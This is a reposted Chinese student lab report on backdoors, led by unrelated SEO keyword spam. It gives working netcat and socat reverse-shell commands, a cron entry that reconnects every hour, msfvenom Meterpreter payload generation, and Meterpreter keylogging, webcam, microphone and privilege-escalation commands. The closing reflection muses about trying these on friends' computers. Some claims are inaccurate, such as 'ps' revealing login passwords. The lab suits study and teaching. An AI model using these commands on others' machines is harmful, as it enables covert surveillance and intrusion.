电梯配件做外贸在哪个网站,怎么做网站才能被收购,网站快速排名推广软件,博客软件 WordPress等一、实验说明 任务一#xff1a;使用netcat获取主机操作Shell#xff0c;cron启动 (0.5分) 任务二#xff1a;使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三#xff1a;使用MSF meterpreter#xff08;或其他软件#xff09;生成可执行文件#xff0c;利用…一、实验说明 任务一使用netcat获取主机操作Shellcron启动 (0.5分) 任务二使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三使用MSF meterpreter或其他软件生成可执行文件利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四使用MSF meterpreter或其他软件生成获取目标主机音频、摄像头、击键记录等内容并尝试提权 (2分) 二、基础问题回答 1.问例举你能想到的一个后门进入到你系统中的可能方式 下载一些破解版的软件时软件内部可能会有附带程序含有恶意代码电子邮件内的链接藏有木马程序链接公共WiFi是注入木马程序u盘拷贝进电脑。 2.问例举你知道的后门如何启动起来(win及linux)的方式 win通过“Windows-控制面板-管理工具-任务计划程序”,创建任务。 Linux可以通过cron来启动通过对正常软件的绑定注入shellcode。 3.问Meterpreter有哪些给你映像深刻的功能 截取击键记录和截图屏幕感觉用电脑一直被监视。 4.问如何发现自己有系统有没有被安装后门 使用杀毒软件查看定期检查进程管理器。 三、实验过程 任务一 使用netcat获取主机操作Shellcron启动 一、Win获得Linux Shell 1.在Windows下使用指令查看win主机IP为192.168.199.187 ipconfig 2.windows调用ncat.exe程序打开监听监听端口为4319 3.在Linux中使用nc指令的-e参数反弹连接win nc #win主机ip# #端口# -e /bin/sh 4. windows下获得一个linux shell可运行任何linux指令如输入ls 二、 Linux获得Win Shell 1. 在Linux下使用指令查看linux主机IP为192.168.199.132 ifconfig 2.Linux下使用nc指令运行监听 nc -l -p 端口号 3. 在windows中使用ncat.exe指令以及-e参数反弹连接Linux: 4. Linux下可看到Windows的命令提示输入windows的 ipconfig命令成功查看到windows主机的IP: ##nc传输数据以后可以用来聊天~我在8888端口等你?_? 1. windows打开端口4319 2.让Linux连接到4319端口 3.建立连接后传输数据可实现互传 三、cron启动 1.Windows-控制面板-管理工具-任务计划程序,创建任务 2.Linux上cron启动在windows系统下监听4319端口 键入指令 crotab –e //-e 表示编辑按a进入编辑界面在最后一行添加 51 * * * * /bin/netcat 192.168.199.187 4319 –e /bin/sh //表示每小时的第21分钟反弹连接win第51分钟后可以输入指令例如ls 任务二 使用socat获取主机操作Shell, 任务计划启动 socat下载地址[https://gitee.com/wildlinux/NetSec/attach_files] 因为之前没有下载这部分是分开做的。 1.win主机ip172.30.3.26 2.Linux主机ip172.30.4.219 3. 在windows系统下输入命令 socat.exe tcp-listen:4319 exec:cmd,pty,stderr 这里要注意路径可以直接将socat.exe拖到小黑框中。 4.在Linux系统下输入命令 socat - tcp: win主机ip 可以成功获得一个cmd shell可以输入指令例如ipconfig 任务三 使用MSF meterpreter生成可执行文件利用ncat或socat传送到主机并运行获取主机Shell。 1.在Linux上输入指令生成一个名称为4319.exe 后门可执行文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.199.132 LPORT4319 -f exe 4319.exe 2.利用ncat传送文件到windows上设置windows接收端口为4319通过以下指令实现文件传输 nc -l 1234 filename.out
nc host.example.com 1234 filename.in 没有截图没有截图忘记了 3.在Linux下MSF打开监听进程可爱的羊 msfconsole 4.查看并设置payload,LHOST和LPORT 第一行进入handle模式 第二行设置payload 第三行查看当前信息状态。 第一行设置LHOST为192.168.199.132 第二行设置LPORT为4319。 4.输入exploit命令开始监听 exploit 5.windows运行该后门文件 6.成功获取shell权限 任务四 使用MSF meterpreter获取截图、击键记录、获取管理员权限偷看登录密码 1.获取截图 使用screenshot命令抓图 2.获取击键记录 keyscan_start //开始获取
keyscan_dump //查看 3.使用摄像头进行拍照 webcam_snap 4.截获一段音频 record_mic 5.获得管理员权限使用ps命令获取登录密码 meterpreter getsystem //获得管理员权限
meterpreter ps //获取登录密码 四、实验中遇到的问题 1.已经解决的问题第一次使用摄像头拍照的时候拍不了原因是超时了重新在win系统运行一下就行 2.还在纠结的问题不知什么叫积极拒绝 五、实验体会 这次实验感触很深让我以后用电脑都有一种被监视的感觉。这次使用Meterpreter还是很有趣的功能很多其中击键记录、偷窥登录密码、控制摄像头等功能觉得以后可以在朋友的电脑上试试看起来很高级的样子不过实际操作做起来还算是比较简单的。由于我的电脑本身就是Windows系统就没有装Windows的虚拟机直接在自己的电脑上做的时候从Linux传4319.exe后门程序到电脑上好几次都直接消失了被腾讯的电脑管家直接清理掉了其实可以把后门程序设置在白名单里面就不用关闭杀毒软件了说明这个后门软件还是很容易被杀毒软件发现并直接清理掉的用在实验上还行实际上可以成功的几率还是很低吧。 转载于:https://www.cnblogs.com/zwl154319/p/8667155.html
